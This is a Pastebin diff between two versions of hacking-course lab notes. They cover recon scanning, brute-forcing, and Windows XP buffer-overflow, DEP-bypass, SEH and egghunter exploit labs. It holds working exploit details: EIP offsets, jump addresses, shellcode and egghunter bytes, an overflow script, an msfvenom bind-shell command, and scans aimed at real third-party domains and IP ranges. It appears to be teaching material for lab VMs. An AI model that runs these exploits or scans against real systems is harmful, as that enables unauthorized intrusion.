View difference between Paste ID: <a href="/Xjr7eQnp">Xjr7eQnp</a> and <a href="/fQbamWpX">fQbamWpX</a> - Pastebin.com

View difference between Paste ID: Xjr7eQnp and fQbamWpX

SHOW: | | - or go back to the newest paste.

1	-	Exploit Development Course
1	+	Ultimate Hacklab
2
3
4	-	##########################
4	+
5	-	# Download the attack VM #
5	+
6	-	##########################
6	+	Download the FreeFloat FTP Server exploit walk-through:
7	-	https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu14.zip
7	+	https://s3.amazonaws.com/infosecaddictsfiles/ff.zip
8	-	user: strategicsec
8	+
9	-	pass: strategicsec
9	+	#################################
10		----------- ############### # Day 1: Advanced Scanning Labs # ############### -----------
11		#################################
12	-	cd /home/strategicsec/toolz/metasploit
12	+
13	-	mkdir DLLs
13	+
14	-	cd DLLs
14	+	---------------------------Type This-----------------------------------
15	-	wget https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/DLLs.zip
15	+	cd ~
16	-	unzip DLLs.zip
16	+
17		mkdir toolz
18
19		cd toolz
20
21		wget https://dl.packetstormsecurity.net/UNIX/scanners/blindcrawl.pl
22	-	https://s3.amazonaws.com/StrategicSec-VMs/XPSP3-ED-Target.zip
22	+
23		perl blindcrawl.pl -d motorola.com
24		-----------------------------------------------------------------------
25
26
27	-	https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-XP-ED-Attack-Host.zip
27	+	-- Take each IP address and look ip up here:
28		http://www.networksolutions.com/whois/index.jsp
29
30
31		Zone Transfer fails on most domains, but here is an example of one that works:
32		---------------------------Type This-----------------------------------
33		dig axfr heartinternet.co.uk @ns.heartinternet.co.uk
34
35
36		cd ~/toolz/
37	-	# Lab 1a: Stack Overflows #
37	+
38		wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c
39
40	-	#############################
40	+	gcc ipcrawl.c -o ipcrawl
41	-	# Start WarFTPd #
41	+
42	-	# Start WinDBG #
42	+	chmod 777 ipcrawl
43	-	# Press F6 #
43	+
44	-	# Attach to war-ftpd.exe #
44	+	./ipcrawl 148.87.1.1 148.87.1.254
45	-	#############################
45	+
46	-	cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1a
46	+
47		sudo nmap -sL 148.87.1.0-255
48		strategicsec
49
50
51	-	At WINDBG prompt
51	+	sudo nmap -sL 148.87.1.0-255 \| grep oracle
52	-	“r” to show registers or “alt+4”
52	+	strategicsec
53		-----------------------------------------------------------------------
54	-	dd esp
54	+
55
56
57
58		########################
59		# Scanning Methodology #
60	-	At WINDBG prompt
60	+	########################
61	-	“r” to show registers or “alt+4”
61	+
62	-	dd esp
62	+	- Ping Sweep
63		What's alive?
64	-	Eip: 32714131
64	+	------------
65	-	esp: affd58 (71413471)
65	+
66		---------------------------Type This-----------------------------------
67	-	Now we need to SSH into the StrategicSec Ubuntu host
67	+	sudo nmap -sP 157.166.226.*
68		-----------------------------------------------------------------------
69	-	cd /home/strategicsec/toolz/metasploit/tools/exploit
69	+
70		-if -SP yields no results try:
71	-	ruby pattern_offset.rb 32714131
71	+	---------------------------Type This-----------------------------------
72	-	485
72	+	sudo nmap -sL 157.166.226.*
73		-----------------------------------------------------------------------
74	-	ruby pattern_offset.rb 71413471
74	+
75	-	493
75	+	-Look for hostnames:
76		---------------------------Type This-----------------------------------
77	-	Distance to EIP is: 485
77	+	sudo nmap -sL 157.166.226.* \| grep com
78	-	Relative position of ESP is: 493
78	+	-----------------------------------------------------------------------
79
80	-	RET – POP EIP
80	+
81	-	RET 4 – POP EIP and shift ESP down by 4 bytes
81	+	- Port Scan
82		What's where?
83	-	cd /home/strategicsec/toolz/metasploit/
83	+	------------
84	-	./msfpescan -j ESP DLLs/xpsp3/shell32.dll
84	+	---------------------------Type This-----------------------------------
85		sudo nmap -sS 162.243.126.247
86	-	0x7c9c167d push esp; retn 0x304d
86	+	-----------------------------------------------------------------------
87	-	0x7c9d30d7 jmp esp < - how about we use this one
87	+
88	-	0x7c9d30eb jmp esp
88	+
89	-	0x7c9d30ff jmp esp
89	+	- Bannergrab/Version Query
90		What versions of software are running
91		-------------------------------------
92	-	warftpd3.py with Notepad++
92	+	---------------------------Type This-----------------------------------
93	-	Fill in the appropriate values
93	+	sudo nmap -sV 162.243.126.247
94	-	Distance to EIP
94	+	-----------------------------------------------------------------------
95	-	Address of JMP ESP
95	+
96		- Vulnerability Research
97		Lookup the banner versions for public exploits
98		----------------------------------------------
99		http://exploit-db.com
100		http://securityfocus.com/bid
101	-	0:003> dd eip
101	+
102	-	0:003> dd esp
102	+
103
104
105
106
107
108	-	Mention bad characters
108	+
109	-	No debugger
109	+
110
111
112
113
114
115
116		##############################
117		# Scanning Process to follow #
118		##############################
119	-	-------------------------------------------------------------
119	+	Step 1: Ping Sweep
120		------------------
121	-	There are 2 things that can go wrong with shellcode. The first thing is a lack of space, and the second is bad characters.
121	+	nmap -sP <IP-ADDRESS-RANGE>
122		nmap -sL <IP-ADDRESS-RANGE>
123	-	Shellcode test 1: Calculate space for shellcode
123	+
124	-	Look in the warftpd3.py script for the shellcode variable. Change the length of the shellcode being send to test how much you can send before the CCs truncate.
124	+
125		Step 2: Port Scan
126		-----------------
127		nmap -sS <IP-ADDRESS>
128
129
130	-	Shellcode test 2: Identify bad characters
130	+	Step 3: Bannergrab
131		------------------
132	-	Replace the INT3 (cc) dummy shellcode with this string:
132	+	nmap -sV <IP-ADDRESS>
133	-	"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
133	+	nmap -sV -p- <IP-ADDRESS>
134		\|
135		----> Vulnerability Research
136	-	Send this new shellcode string and identify the places where it truncates - these are the bad characters
136	+
137
138		Step 4: Vulnerability Scan the webservers
139		-----------------------------------------
140		git clone https://github.com/sullo/nikto.git Nikto2
141	-	Here is what the string looks like after I manually tested and removed each of the bad characters:
141	+
142	-	shellcode = "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
142	+	cd Nikto2/program
143
144		perl nikto.pl -h <IP-ADDRESS>
145
146
147	-	./msfvenom -p windows/shell/bind_tcp -f python -b '\x00\x0a\x0d\x40'
147	+
148		Step 5: Directory Bruteforce
149		--------------------
150		sudo apt install -y libcurl4-openssl-dev
151
152		git clone https://github.com/v0re/dirb.git
153
154		cd dirb/
155
156		./configure
157
158		make
159
160		./dirb
161
162		./dirb http://<IP-ADDRESS> wordlists/big.txt
163
164
165
166	-	At WINDBG prompt
166	+
167	-	“r” to show registers or “alt+4”
167	+
168		Step 6: Bruteforce any services you find
169	-	dd esp
169	+	----------------------------------------
170		root@kali:~# hydra -L username.txt -P passlist.txt ftp://<IP-ADDRESS
171		root@kali:~# hydra -l user -P passlist.txt ftp://<IP-ADDRESS
172
173
174
175
176
177	-	At WINDBG prompt
177	+
178	-	“r” to show registers or “alt+4”
178	+
179	-	dd esp
179	+	------- Learning the guts of exploit development ------------------
180		Day 1: Exploit Research
181	-	Eip: 32714131
181	+	http://www.securitytube.net/groups?operation=view&groupId=7
182	-	esp: affd58 (71413471)
182	+
183		Day 2: Python Hacking
184	-	Now we need to SSH into the StrategicSec Ubuntu host
184	+	https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (videos 1-10 if you are a complete beginner)
185		https://www.youtube.com/playlist?list=PL1A2CSdiySGLtKwqBnqj9BON6QQjWkP4n (entire playlist)
186	-	cd /home/strategicsec/toolz/metasploit/tools/exploit
186	+
187
188	-	ruby pattern_offset.rb 32714131
188	+	Ensure that your Linux host can ping your Windows XP host (aka: The Green Machine)
189	-	485
189	+
190
191	-	ruby pattern_offset.rb 71413471
191	+	From your Linux host - please type the following commands
192	-	493
192	+	---------------------------Type This-----------------------------------
193		cd ~
194
195		wget https://s3.amazonaws.com/infosecaddictsfiles/ED-Workshop-Files.zip
196
197		unzip ED-Workshop-Files.zip
198
199		cd ED-Workshop-Files
200
201		---------------------------Type This-----------------------------------
202
203		cd Lab1a
204
205
206		python warftpd1.py \| nc XPSP3-ED-Target-IP 21
207		-----------------------------------------------------------------------
208
209		At WINDBG prompt
210		“r” to show registers or “alt+4”
211
212		---------------------------Type This-----------------------------------
213	-	0:003> dd eip
213	+
214	-	0:003> dd esp
214	+	dd esp
215		-----------------------------------------------------------------------
216
217		---------------------------Type This-----------------------------------
218
219		python warftpd2.py \| nc XPSP3-ED-Target-IP 21
220		-----------------------------------------------------------------------
221
222
223		At WINDBG prompt
224		“r” to show registers or “alt+4”
225
226		---------------------------Type This-----------------------------------
227
228		dd esp
229		-----------------------------------------------------------------------
230
231		Eip: 32714131
232		esp: affd58 (71413471)
233
234		Now we need to SSH into the StrategicSec Ubuntu host
235
236		---------------------------Type This-----------------------------------
237
238		cd /home/strategicsec/toolz/metasploit/tools
239
240		ruby pattern_offset.rb 32714131
241		485
242
243		ruby pattern_offset.rb 71413471
244		493
245		-----------------------------------------------------------------------
246
247		Distance to EIP is: 485
248		Relative position of ESP is: 493
249
250	-	Then we need to jump to the LdrpCheckNXCompatibility routine in
250	+	RET – POP EIP
251		RET 4 – POP EIP and shift ESP down by 4 bytes
252
253		---------------------------Type This-----------------------------------
254
255		cd /home/strategicsec/toolz/metasploit/
256		./msfpescan -j ESP DLLs/xpsp3/shell32.dll
257		-----------------------------------------------------------------------
258
259		0x7c9c167d push esp; retn 0x304d
260		0x7c9d30d7 jmp esp < - how about we use this one
261		0x7c9d30eb jmp esp
262		0x7c9d30ff jmp esp
263
264
265		warftpd3.py with Notepad++
266		Fill in the appropriate values
267		Distance to EIP
268		Address of JMP ESP
269
270
271		---------------------------Type This-----------------------------------
272
273		python warftpd3.py \| nc XPSP3-ED-Target-IP 21
274	-	This set of instructions makes sure that AL is set to 1, 2 is pushed
274	+
275		0:003> dd eip
276		0:003> dd esp
277		-----------------------------------------------------------------------
278
279
280
281
282
283		Mention bad characters
284		No debugger
285
286
287		---------------------------Type This-----------------------------------
288
289	-	#############################
289	+
290	-	# Start WarFTPd #
290	+
291	-	# Start WinDBG #
291	+
292	-	# Press F6 #
292	+	-----------------------------------------------------------------------
293	-	# Attach to war-ftpd.exe #
293	+
294	-	# bp 0x775ee00e #
294	+
295	-	# g #
295	+
296	-	#############################
296	+
297		# Lab 1b: Stack Overflows with DEP Bypass #
298		###########################################
299
300		Reboot your target host and choose the "2nd" option for DEP.
301
302
303	-	---------------------------------------------------------------------------
303	+
304
305
306	-	mov al,0x1
306	+	---------------------------Type This-----------------------------------
307	-	ret 0x4
307	+
308		python warftpd1.py \| nc XPSP3-ED-Target-IP 21
309
310		At WINDBG prompt
311		“r” to show registers or “alt+4”
312	-	0:005> g
312	+
313	-	Breakpoint 0 hit
313	+	dd esp
314	-	eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
314	+
315	-	eip=775ee00e esp=00affd58 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
315	+
316	-	cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
316	+
317	-	ole32!CSSMappedStream::IsWriteable:
317	+
318	-	775ee00e b001 mov al,1
318	+
319
320
321	-	0:001> t
321	+	At WINDBG prompt
322	-	eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
322	+	“r” to show registers or “alt+4”
323	-	eip=775ee010 esp=00affd58 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
323	+	dd esp
324	-	cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
324	+	-----------------------------------------------------------------------
325	-	ole32!CSSMappedStream::IsWriteable+0x2:
325	+
326	-	775ee010 c20400 ret 4
326	+	Eip: 32714131
327		esp: affd58 (71413471)
328
329		Now we need to SSH into the StrategicSec Ubuntu host
330
331		---------------------------Type This-----------------------------------
332	-	---------------------------------------------------------------------------
332	+
333	-	Ok, so inside of ntdll.dll we need to find the following instructions:
333	+	cd /home/strategicsec/toolz/metasploit/tools
334
335	-	CMP AL,1
335	+	ruby pattern_offset.rb 32714131
336	-	PUSH 2
336	+	485
337	-	POP ESI
337	+
338	-	JE ntdll.7
338	+	ruby pattern_offset.rb 71413471
339		493
340	-	0:001> t
340	+
341	-	eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
341	+
342	-	eip=7c91cd24 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl nz ac pe nc
342	+
343	-	cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
343	+
344	-	ntdll!LdrpCheckNXCompatibility+0x13:
344	+
345	-	7c91cd24 3c01 cmp al,1
345	+
346
347
348	-	0:001> t
348	+	cd /home/strategicsec/toolz/metasploit/tools
349	-	eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
349	+
350	-	eip=7c91cd26 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
350	+
351	-	cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
351	+
352	-	ntdll!LdrpCheckNXCompatibility+0x15:
352	+
353	-	7c91cd26 6a02 push 2
353	+
354		./msfpescan -j ESP DLLs/xpsp3/shell32.dll \| grep 0x7c9d30d7
355
356	-	0:001> t
356	+
357	-	eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=7c80932e edi=00affe58
357	+
358	-	eip=7c91cd28 esp=00affd5c ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
358	+
359	-	cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
359	+
360	-	ntdll!LdrpCheckNXCompatibility+0x17:
360	+	0:003> dd eip
361	-	7c91cd28 5e pop esi
361	+	0:003> dd esp
362
363		INT3s - GOOD!!!!!!!
364	-	0:001> t
364	+
365	-	eax=00000001 ebx=00000000 ecx=00000001 edx=00000000 esi=00000002 edi=00affe58
365	+
366	-	eip=7c91cd29 esp=00affd60 ebp=00affdb0 iopl=0 nv up ei pl zr na pe nc
366	+
367	-	cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
367	+
368	-	ntdll!LdrpCheckNXCompatibility+0x18:
368	+
369	-	7c91cd29 0f84df290200 je ntdll!LdrpCheckNXCompatibility+0x1a (7c93f70e) [br=1]
369	+
370		-----------------------------------------------------------------------
371
372	-	---------------------------------------------------------------------------
372	+
373		strategicsec....exploit no workie!!!!
374
375
376		Why????????? DEP!!!!!!!!!!!!!
377
378
379
380
381	-	##########################
381	+
382	-	# Lab 1c: SEH Overwrites #
382	+
383	-	##########################
383	+
384		ret 0x4
385	-	#################################################
385	+
386	-	# On our VictimXP Host (XPSP3-ED-Target-IP) #
386	+
387	-	# Start sipXexPhone if it isn’t already running #
387	+
388	-	# Start WinDBG #
388	+
389	-	# Press “F6” and Attach to sipXexPhone.exe #
389	+	---------------------------Type This-----------------------------------
390	-	# Press “F5” to start the debugger #
390	+
391	-	#################################################
391	+
392		-----------------------------------------------------------------------
393
394	-	cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1c\sipx_complete
394	+
395		0x775ee00e b001c204
396		0x775ee00e mov al, 1
397		0x775ee010 ret 4
398	-	python sipex0.py XPSP3-ED-Target-IP
398	+
399
400	-	0:003> !exchain
400	+	Then we need to jump to the LdrpCheckNXCompatibility routine in
401	-	0:003> dds esp
401	+
402	-	0:003> dds
402	+
403
404	-	python sipex1.py XPSP3-ED-Target-IP
404	+
405		Inside of ntdll.dll we need to find the following instructions:
406	-	0:003> !exchain
406	+
407	-	0:003> g
407	+
408		PUSH 2
409	-	When looking at !exchain you should see that EIP is 41414141, so let’s add more characters.
409	+
410		JE ntdll.7
411
412	-	python sipex2.py XPSP3-ED-Target-IP
412	+
413		---------------------------Type This-----------------------------------
414	-	0:003> !exchain
414	+
415	-	0:003> g
415	+
416		-----------------------------------------------------------------------
417
418	-	*ssh into instructor Ubuntu host*
418	+
419	-	cd /home/strategicsec/toolz/metasploit/tools/exploit
419	+
420	-	ruby pattern_offset.rb 41346941 We should see that SEH is at 252
420	+
421		0x7c91cd26 push 2
422		0x7c91cd28 pop esi
423		0x7c91cd29 jz 7
424	-	!load narly
424	+
425	-	!nmod
425	+
426		This set of instructions makes sure that AL is set to 1, 2 is pushed
427	-	*ssh into the Ubuntu host*
427	+
428	-	ls /home/strategicsec/toolz/metasploit/DLLs/xpsp3/sipXDLLs/
428	+
429	-	cd /home/strategicsec/toolz/metasploit/
429	+
430	-	./msfpescan -p DLLs/xpsp3/sipXDLLs/sipxtapi.dll
430	+
431
432		---------------------------Type This-----------------------------------
433	-	#####################################
433	+
434	-	# sipex3.py in Notepad++. #
434	+
435	-	# Set cseq = 252 #
435	+
436	-	# Set seh2 address to: 0x10015977 #
436	+
437	-	#####################################
437	+
438		"A"*0x54
439
440	-	python sipex3.py XPSP3-ED-Target-IP
440	+
441	-	0:003> !exchain
441	+
442
443	-	python sipex4.py XPSP3-ED-Target-IP
443	+
444
445		nc XPSP3-ED-Target-IP 4444
446		-----------------------------------------------------------------------
447		https://packetstormsecurity.com/files/tags/exploit/
448
449
450
451
452
453	-	Brush up on the basics of Structured Exception Handlers:
453	+	------ Learning the GUTS of exploit development ----------------
454	-	http://www.securitytube.net/video/1406
454	+
455	-	http://www.securitytube.net/video/1407
455	+
456	-	http://www.securitytube.net/video/1408
456	+
457
458
459
460
461	-	Here are the slides for the exploit dev basics:
461	+
462	-	https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+1+-+Getting+Started.pptx
462	+
463	-	https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+2+-+The+Process.pptx
463	+
464	-	https://s3.amazonaws.com/StrategicSec-Files/ExploitDev/Exploit+Dev+For+Mere+Mortals+-+Part+4+-+Windows+Stack+Overflows.pptx
464	+
465
466
467	-	Here are the exploit dev basic videos:
467	+
468	-	https://s3.amazonaws.com/StrategicSec-Videos/2013-10-01+20.21+Exploit+Dev+Night+School+October+2013.wmv
468	+
469	-	https://s3.amazonaws.com/StrategicSec-Videos/2013-10-03+19.11+Exploit+Dev+Night+School+October+2013.wmv
469	+	##############################
470	-	https://s3.amazonaws.com/StrategicSec-Videos/2013-10-08+19.10+Exploit+Dev+Night+School+October+2013.wmv
470	+	# Scanning Process to follow #
471	-	https://s3.amazonaws.com/StrategicSec-Videos/2013-10-10+19.03+Exploit+Dev+Night+School+October+2013.wmv
471	+	##############################
472	-	https://s3.amazonaws.com/StrategicSec-Videos/2013-10-17+19.13+Exploit+Dev+Night+School+October+2013.wmv
472	+	Step 1: Ping Sweep
473		------------------
474		nmap -sP <IP-ADDRESS-RANGE>
475		nmap -sL <IP-ADDRESS-RANGE>
476	-	Recommended videos on Structured Exception Handling:
476	+
477	-	http://www.securitytube.net/video/1406
477	+
478	-	http://www.securitytube.net/video/1407
478	+	Step 2: Port Scan
479	-	http://www.securitytube.net/video/1408
479	+	-----------------
480		nmap -sS <IP-ADDRESS>
481
482	-	########################################
482	+
483	-	# Lab 2a: Not Enough Space (Egghunter) #
483	+	Step 3: Bannergrab
484	-	########################################
484	+
485		nmap -sV <IP-ADDRESS>
486	-	cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\sws_skeleton
486	+	nmap -sV -p- <IP-ADDRESS>
487		\|
488	-	SWS - SIMPLE WEB SERVER
488	+	----> Vulnerability Research
489	-	-----------------------
489	+
490
491	-	Running SWS on Strategicsec-XP-ED-Target-VM
491	+	Step 4: Vulnerability Scan the webservers
492	-	Start > Programs > Simple Web Server (it's in the middle somewhere)
492	+	-----------------------------------------
493	-	Red icon in system tray
493	+	git clone https://github.com/sullo/nikto.git Nikto2
494	-	Double click it
494	+
495	-	- it will pop up a menu
495	+	cd Nikto2/program
496	-	- select "start"
496	+
497	-	- dialog box shows starting params - port 82
497	+	perl nikto.pl -h <IP-ADDRESS>
498
499	-	WinDBG
499	+
500	-	- attach to "server.exe"
500	+
501		Step 5: Directory Bruteforce
502		--------------------
503	-	python sws1.py \| nc XPSP3-ED-Target-IP 82
503	+	sudo apt install -y libcurl4-openssl-dev
504
505		git clone https://github.com/v0re/dirb.git
506
507	-	python sws2.py \| nc XPSP3-ED-Target-IP 82
507	+	cd dirb/
508
509		./configure
510	-	SSH into the Ubuntu host (user: strategicsec/pass: strategicsec)
510	+
511		make
512	-	ruby pattern_offset.rb 41356841 <------- You should see that EIP is at 225
512	+
513	-	ruby pattern_offset.rb 68413668 <------- You should see that ESP is at 229
513	+	./dirb
514
515		./dirb http://<IP-ADDRESS> wordlists/big.txt
516
517
518
519
520
521		Step 6: Bruteforce any services you find
522	-	EGGHUNTER:
522	+	----------------------------------------
523	-	----------
523	+	root@kali:~# hydra -L username.txt -P passlist.txt ftp://<IP-ADDRESS
524		root@kali:~# hydra -l user -P passlist.txt ftp://<IP-ADDRESS
525	-	"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
525	+
526	-	"\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
526	+
527	-	^^^^^^^^^^^^^^^^
527	+
528	-	ABBA
528	+
529	-	JMP ESP
529	+
530	-	/
530	+
531	-	/
531	+	##############################
532	-	GET /AAAAAAAAAAA...225...AAAAAAAAAA[ EIP ]$egghunter HTTP/1.0
532	+	----------- ############### # Day 2: Stack Overflow Labs # ############### -----------
533	-	User-Agent: ABBAABBA LARGE SHELLCODE (Alpha2 encoded)
533	+	##############################
534
535
536
537
538	-	-----sws3.py-----
538	+
539	-	#!/usr/bin/python2
539	+	#######################################
540		# Download the class virtual machines #
541	-	import os # for output setting
541	+	#######################################
542	-	import sys
542	+
543	-	import struct # for pack function
543	+
544		https://s3.amazonaws.com/infosecaddictsvirtualmachines/XPSP3-ED-Target.zip
545	-	# turn off output buffer and set binary mode
545	+
546	-	sys.stdout = os.fdopen(sys.stdout.fileno(), 'wb', 0)
546	+
547
548
549	-	pad = "A" * 225 # distance to EIP
549	+	https://s3.amazonaws.com/infosecaddictsvirtualmachines/Strategicsec-XP-ED-Attack-Host.zip
550	-	eip = 0x7e429353 # replace EIP to point to "jmp esp" from user32.dll
550	+
551		pass: strategicsec
552	-	egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
552	+
553	-	egghunter += "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
553	+
554
555	-	shellcode = "\xCC" * 700
555	+	https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
556		username: workshop
557	-	buf = "GET /"
557	+	password: password
558	-	buf += pad + struct.pack('<I', eip) + egghunter
558	+
559	-	buf += " HTTP/1.0\r\n"
559	+
560	-	buf += "User-Agent: ABBAABBA"
560	+
561	-	buf += shellcode
561	+
562	-	buf += " HTTP/1.0\r\n"
562	+
563
564	-	sys.stdout.write(buf)
564	+
565	-	-----
565	+
566		# Download this file on your windows VM #
567	-	############################################
567	+
568	-	# Lab 2b: Not Enough Space (Negative Jump) #
568	+	https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
569	-	############################################
569	+	https://s3.amazonaws.com/infosecaddictsfiles/SLmail5-5-Exploit.zip
570
571	-	cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\modjk_skeleton
571	+
572
573
574	-	[pad = distance_to_seh - len(shellcode) ] [ shellcode] [jmp4 = "\x90\x90\xEB\x04"] [eip (pop pop ret)] [jmp_min = "\xE9\x98\xEF\xFF\xFF"]
574	+	#####################################
575		# Quick Stack Based Buffer Overflow #
576	-	^
576	+	#####################################
577	-	1 ----------------------1 overflow the buffer---------------------------\|
577	+
578	-
578	+	- You can download everything you need for this exercise (except netcat) from the link below
579	-	^ ^
579	+	https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
580	-	\|
580	+
581	-	2 ----jump over seh record---\|
581	+	- Extract this zip file to your Desktop
582
583	-	^ ^
583	+	- Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
584	-	\|
584	+
585	-	3--POP 2 words off stack---\|
585	+	- Open a new command prompt and type:
586		nc localhost 9999
587	-	^
587	+
588	-	4 -----negative jump into NOPs - then into shellcode -----------------------------------------------------------------------------------\|
588	+	- In the new command prompt window where you ran nc type:
589		HELP
590
591		- Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
592	-	# Lab 2c: Not Enough Space (Trampoline) #
592	+	- Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
593
594		- Now double-click on 1-simplefuzzer.py
595	-	cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2c\tftpd_skeleton
595	+	- You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
596	-	On the Strategicsec-XP-ED-Target-VM VM
596	+
597
598	-	- open a command prompt
598	+	- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
599	-	- c:\software\tftpd32
599	+
600	-	- run tftpd32.exe
600	+	- Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
601	-	- UDP port 69
601	+
602	-	(socket code is already in the scripts)
602	+	- Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
603
604		- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
605
606		- Now isolate the crash by restarting your debugger and running script 2-3000chars.py
607	-	On your attack host please install:
607	+
608		- Calculate the distance to EIP by running script 3-3000chars.py
609		- This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
610	-	NASM - Netwide Assembler
610	+
611		4-count-chars-to-EIP.py
612		- In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
613		- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it
614
615		5-2006char-eip-check.py
616	-	-----------------------------------------------------------------------------------------------------------------
